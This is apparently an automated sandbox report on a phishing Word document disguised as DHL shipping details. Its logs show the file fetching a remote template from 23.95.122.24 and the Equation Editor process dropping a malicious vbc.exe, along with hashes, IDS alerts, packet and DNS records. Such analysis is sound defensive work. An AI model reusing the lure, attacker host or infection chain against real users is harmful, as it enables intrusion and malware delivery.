                                                                                                                                                  SHA-256:7B6042BC97E26DEF346B27CE7BE84A74D59900B0894957709BCB11B9EFB5B17D
                                                                                                                                                  SHA-512:68A5782DE52FA8DDE219F18327A03FAB3E98EC1090837BB6FDC33B441F127D0999FA1A25865BE762863E29C51790996889231126031BEDA94DDFCEFCA47E10F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [InternetShortcut]..URL=http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\................................................................................dot.url
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/.................>), ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):187
                                                                                                                                                  Entropy (8bit):2.6645253060565093
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:HRAbABGQYm/ehLOXGa2NCECOCDL8vbpKovn:HRYFVm/K4GamBcov
                                                                                                                                                  MD5:73B2615362C3FE0FB01D66FCE88877F1
                                                                                                                                                  SHA1:F5EB7FC057528410EB83F62B8D6F981A40351BF6
                                                                                                                                                  SHA-256:063F86C8C5E079BE7349F051DFDDB8EF5CD8A8FF8B1BB5C7288F41CC37DB992D
                                                                                                                                                  SHA-512:78472741582D4C84ACE4D8F037ECEF863D9BA99B840287C5DDCB731A0AD71FA7CDC2CDEEDD6DE0B25BB2D61BF07D428F4FA52B958F7E6BC7BE1DD96744054BA7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [InternetShortcut]..URL=http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL Shipping doc & Shipment tracking details.LNK
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Apr 8 19:17:35 2021, length=10327, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2378
                                                                                                                                                  Entropy (8bit):4.601459701041042
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8v/XTFGqOWhkLX4hk8sAQh2v/XTFGqOWhkLX4hk8sAQ/:8v/XJGqOWhkj4hk8vQh2v/XJGqOWhkjB
                                                                                                                                                  MD5:9BC6F39551E02BD9C07CA63F140F125C
                                                                                                                                                  SHA1:5C646BC35575C90D87971033761C66C636002C51
                                                                                                                                                  SHA-256:4A9F4D594C82D025F771F9DBDC3FA1B426ED020A38974E92FFEECDC36FA6D14E
                                                                                                                                                  SHA-512:C31083A8F0CDB124A11A5ED17D97DF5DDBEB5810849373EC11081C49654E7A95AF56325C5E3AA2C4E051328E9C1C519ED01CD4AD89DD31D4D08AB989AF4D0B0B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F.... .....)..{....)..{...N}6.,..W(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.W(...R2. .DHLSHI~1.DOC..........Q.y.Q.y*...8.....................D.H.L. .S.h.i.p.p.i.n.g. .d.o.c. .&. .S.h.i.p.m.e.n.t. .t.r.a.c.k.i.n.g. .d.e.t.a.i.l.s...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop\DHL Shipping doc & Shipment tracking details.docx.H.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L. .S.h.i.p.p.i.n.g. .d.o.c. .&. .S.h.i.p.m.e.n.t. .t.r.a.c.k.i.n.g. .d.e.t.a.i.l.s...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):547
                                                                                                                                                  Entropy (8bit):3.4687573675441232
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:Vk9/aNrPKpk9lMVulEcvJVh2VulEcvJnpk9lMVulEcvJL:k/srCYlMVcE6l2VcE6hYlMVcE6l
                                                                                                                                                  MD5:F13178557A2770D28E9168A7D862AC2E
                                                                                                                                                  SHA1:67394C8D3DC0B10C769E5163DAE8AEB60BE361E0
                                                                                                                                                  SHA-256:31D356CA93634748DFC4709B96D9D4480BC0BB0A2169AF7E96F7536406151465
                                                                                                                                                  SHA-512:C6A962BA5CDCCF7464F5C959E52BE8EEFC2DCCF4EE56565D0AF90C4AABF99E7E4411DA714971A5DCF96114DF0266F03674EA00008D219F75E2E74A5E44EB577C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [dot]..................................................................................dot.url=0....-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- on 23.95.122.24.url=0..[dot]..................................................................................dot.url=0..[misc]..DHL Shipping doc & Shipment tracking details.LNK=0..DHL Shipping doc & Shipment tracking details.LNK=0..[dot]..................................................................................dot.url=0..[misc]..DHL Shipping doc & Shipment tracking details.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..
                                                                                                                                                  C:\Users\user\Desktop\~$L Shipping doc & Shipment tracking details.docx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.431160061181642
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):387072
                                                                                                                                                  Entropy (8bit):6.9572597315329805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                  MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                  SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                  SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                  SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: dot.dot, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                  Entropy (8bit):6.903597109209728
                                                                                                                                                  TrID:
                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                  • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                  File name:DHL Shipping doc & Shipment tracking details.docx
                                                                                                                                                  File size:10327
                                                                                                                                                  MD5:30909a9932c77fb923a96b1b090b4806
                                                                                                                                                  SHA1:2bbe988290a47de63763796db6a39de0e268a5cf
                                                                                                                                                  SHA256:23e650ad3f02ea9f4a402bf5e719d745b7c307c34fd8915045c79d51aab48741
                                                                                                                                                  SHA512:3a42c4e4384bed6fe50d3ac3cc02d65108b315ae899abea355792d2f1063be415d80aa1786bac9053a5b7a5f622491fcc5e53cb8c222c252a430b9af0c034836
                                                                                                                                                  SSDEEP:192:ScIMmtPm0jwluG/bHF/g4CBAfXViwtpV8b3xl:SPXBjwldHZkBoViMQH
                                                                                                                                                  File Content Preview:PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e6a2a2a4b4b4a4

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  04/08/21-13:17:53.729589TCP1142WEB-MISC /.... access4916880192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:17:58.032868TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:17:58.160534TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:17:59.540071TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:17:59.663271TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:00.985110TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:01.108862TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:01.397148TCP1142WEB-MISC /.... access4917080192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:01.656847TCP1142WEB-MISC /.... access4917080192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:05.495172TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:05.619649TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:09.682004TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:18:09.805867TCP1042WEB-IIS view source via translate header4916980192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:19:57.084356TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:19:57.207366TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:20:00.985138TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:20:01.105660TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:20:03.142020TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24
                                                                                                                                                  04/08/21-13:20:03.262106TCP1042WEB-IIS view source via translate header4917280192.168.2.2223.95.122.24

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 8, 2021 13:17:52.831468105 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:52.949044943 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:52.949196100 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:52.950525999 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.077128887 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:53.077244997 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.611469030 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.728966951 CEST804916823.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:53.729084969 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.729588985 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.847738981 CEST804916823.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:54.056507111 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:57.909595013 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.032418966 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:58.032588959 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.032867908 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.159369946 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:58.160533905 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.296209097 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:58.502851009 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.601722002 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:58.604367971 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:59.367635965 CEST804916823.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:59.367717981 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:59.368309975 CEST4916880192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:59.485479116 CEST804916823.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:59.540071011 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:59.662621975 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:17:59.663270950 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:59.795531034 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:00.000582933 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:00.985110044 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.108045101 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.108861923 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.238528013 CEST804916923.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.273871899 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.275126934 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.390974045 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.395730019 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.396253109 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.397147894 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.435971975 CEST4916980192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.518948078 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.518975973 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.518990040 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.519002914 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.519387960 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.640276909 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640302896 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640325069 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640367985 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640465975 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.640479088 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.640495062 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640522957 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.640558958 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.656847000 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:01.778624058 CEST804917023.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:01.778934002 CEST4917080192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.438899040 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.557132959 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.557245970 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.557885885 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.677747011 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.677825928 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.677910089 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.678196907 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.678235054 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.678246975 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.678592920 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.678641081 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796221972 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796274900 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796366930 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796411037 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796814919 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796857119 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796876907 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796896935 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796896935 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796936989 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.796941042 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796983004 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.796987057 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.797030926 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.797032118 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.797074080 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.923409939 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923455954 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923496008 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923535109 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923573017 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923609972 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923624992 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.923650980 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923680067 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.923691034 CEST804917123.95.122.24192.168.2.22
                                                                                                                                                  Apr 8, 2021 13:18:02.923691034 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.923700094 CEST4917180192.168.2.2223.95.122.24
                                                                                                                                                  Apr 8, 2021 13:18:02.923742056 CEST4917180192.168.2.2223.95.122.24

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 8, 2021 13:20:07.294760942 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                  Apr 8, 2021 13:20:07.333528996 CEST53521978.8.8.8192.168.2.22

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Apr 8, 2021 13:20:07.294760942 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.nevomo.groupA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Apr 8, 2021 13:20:07.333528996 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.nevomo.group213.186.33.5A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 23.95.122.24
                                                                                                                                                  • www.nevomo.group

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.224916723.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:17:52.950525999 CEST0OUTOPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/ HTTP/1.1
                                                                                                                                                  User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 8, 2021 13:17:53.077128887 CEST0INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:17:54 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: httpd/unix-directory


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.224916823.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:17:53.729588985 CEST1OUTHEAD /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:53.847738981 CEST1INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:17:54 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Last-Modified: Wed, 07 Apr 2021 18:00:13 GMT
                                                                                                                                                  ETag: "3263-5bf65b3dc8631"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 12899
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.224916923.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:17:58.032867908 CEST2OUTOPTIONS /..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                  translate: f
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Apr 8, 2021 13:17:58.159369946 CEST2INHTTP/1.1 301 Moved Permanently
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:17:59 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
                                                                                                                                                  Content-Length: 389
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
